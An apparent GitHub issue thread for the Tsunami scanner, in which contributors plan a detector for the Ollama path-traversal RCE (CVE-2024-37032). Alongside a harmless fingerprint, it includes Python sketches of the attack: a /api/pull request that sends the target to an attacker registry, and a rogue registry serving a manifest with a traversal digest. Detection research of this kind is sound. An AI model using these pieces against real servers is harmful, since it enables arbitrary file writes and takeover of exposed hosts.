AI PRP: Ollama Remote Code Execution Vulnerability #511
Comments
Hi @grandsilva, Could you start by writing a fingerprint for Ollama? ~tooryx
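As background on what such a fingerprint would check: a stock Ollama server answers `GET /` on its default port 11434 with the banner "Ollama is running", which is enough for a first-pass detection. A minimal sketch in Python (this is an illustration, not a Tsunami plugin; the helper names are made up):

```python
import urllib.request

# Body returned by GET / on a stock Ollama server (per Ollama's documentation).
OLLAMA_BANNER = b"Ollama is running"

def looks_like_ollama(body: bytes) -> bool:
    """Return True if an HTTP response body matches the Ollama banner."""
    return OLLAMA_BANNER in body

def fingerprint(host: str, port: int = 11434, timeout: float = 5.0) -> bool:
    """Fetch the root endpoint and check it against the banner."""
    try:
        with urllib.request.urlopen(f"http://{host}:{port}/", timeout=timeout) as resp:
            return looks_like_ollama(resp.read())
    except OSError:
        return False
```

A real fingerprint would likely also probe API routes such as `/api/tags` to reduce false positives, but banner matching is the simplest starting point.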
Hi @tooryx
Thanks @grandsilva. Anyone that is interested in writing that fingerprint can then create the issue and I will accept it. Feel free to suggest other plugins in the meantime. ~tooryx
@grandsilva Could you start the vuln research and focus on these 2 areas:
Please provide a timely response; I will monitor this thread. Thanks!
@maoning We need to host a Docker image; hosting the image is possible with the GitHub Container Registry. Another option is hosting a Docker image via a web server with 4 or 5 endpoints (Docker Image Manifest V2). We can send arbitrary GET requests to check the exposed API server, but that alone is unlikely to be enough to validate the arbitrary file write and file read CVEs via SSRF.
@grandsilva could you elaborate more on how the docker image interacts with the target Ollama service?
OK, sorry about the bad explanation. An API endpoint on the Ollama web server allows pulling a Docker image from an arbitrary registry server. We need to control that registry HTTP server because we deliver our payload when the Ollama server pulls our image (the exploit payload). A researcher has already written such an HTTP server: https://github.com/Bi0x/CVE-2024-37032. Since we can point the pull at an arbitrary URL, we can also send a GET request to the Tsunami callback server.
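For context on the trigger: per the linked Wiz write-up, the endpoint that makes a vulnerable Ollama server contact an attacker-controlled registry is `POST /api/pull`, and setting `"insecure": true` lets Ollama talk to a plain-HTTP registry. A sketch of building that request (host names and the image name are placeholders, not values from this thread):

```python
import json
import urllib.request

def build_pull_request(target: str, registry: str) -> urllib.request.Request:
    """Build the POST /api/pull request that asks Ollama to fetch a model
    from an attacker-controlled registry (format: <registry>/<namespace>/<model>:<tag>)."""
    payload = {
        "name": f"{registry}/library/evil:latest",  # placeholder image name
        "insecure": True,  # allow a plain-HTTP registry
    }
    return urllib.request.Request(
        f"http://{target}/api/pull",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
```

The request is only built here, not sent; a detector would send it and then watch for the target connecting back to the controlled registry or callback server.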
Hey @grandsilva, Could you look into using images such as curl or bash to try to communicate with the callback server? Would that work? Would any image or deployment be left on the target after exploitation? Cheers,
Hi @grandsilva, What are your thoughts on this? ~tooryx
Hi @grandsilva, I will discuss this with the rest of the team, but as far as I know we are a lot less interested in GeoServer. ~tooryx
Hi @grandsilva, In that case, I will release this one to be grabbed by other contributors. ~tooryx
Hi @OccamsXor, you can work on this. ~tooryx
I checked a couple of vulnerability analysis posts for CVE-2024-37032, and it seems that exploiting the vulnerability requires a web server that behaves as a private registry and supplies a malicious manifest file, containing a path traversal payload in the digest field, to the vulnerable system. @grandsilva also mentioned the same issue here: #511 (comment) My question is: does Tsunami have the functionality to start a custom web server during scanning? This web server should be able to serve responses determined by the plugin. Ref: https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
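To illustrate what that custom web server would have to do: it only needs to answer the few Docker Registry V2 endpoints Ollama requests during a pull, returning a manifest whose digest field carries the traversal payload. A sketch based on the Wiz write-up and the PoC linked above (endpoint handling is simplified, and the traversal path is a harmless placeholder, not a working exploit):

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# Placeholder traversal digest; a real exploit targets a sensitive file
# (the Wiz write-up uses /etc/ld.so.preload on the victim).
EVIL_DIGEST = "sha256:../../../../../../tmp/poc"

def build_manifest(digest: str) -> bytes:
    """Docker Image Manifest V2 whose layer digest is attacker-controlled."""
    manifest = {
        "schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
                   "size": 2, "digest": digest},
        "layers": [{"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
                    "size": 2, "digest": digest}],
    }
    return json.dumps(manifest).encode()

class RogueRegistry(BaseHTTPRequestHandler):
    def do_GET(self):
        if "/manifests/" in self.path:   # GET /v2/<name>/manifests/<tag>
            body = build_manifest(EVIL_DIGEST)
        elif "/blobs/" in self.path:     # GET /v2/<name>/blobs/<digest>
            body = b"{}"                 # blob bytes get written to the traversed path
        else:                            # GET /v2/ API version check
            body = b"{}"
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

# To run: HTTPServer(("0.0.0.0", 8000), RogueRegistry).serve_forever()
```

This is exactly the capability the question above is about: Tsunami would need to host such a server (or an equivalent callback-aware responder) for the duration of the scan.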
Hi @OccamsXor, No, currently Tsunami does not have such capability. I will chat with the rest of the team to see if we can find a solution for this. ~tooryx
According to this research:
This vulnerability needs an arbitrary file write to gain RCE. I'm not sure if this is the preferred method for writing Tsunami plugins.
If you're interested in developing a tsunami plugin to detect exposed Ollama HTTP servers, I'll proceed with further research on this case.
(That said, I think Ollama is currently one of the most popular open-source repositories on GitHub, maybe the most popular.)
links:
https://github.com/ollama/ollama
https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032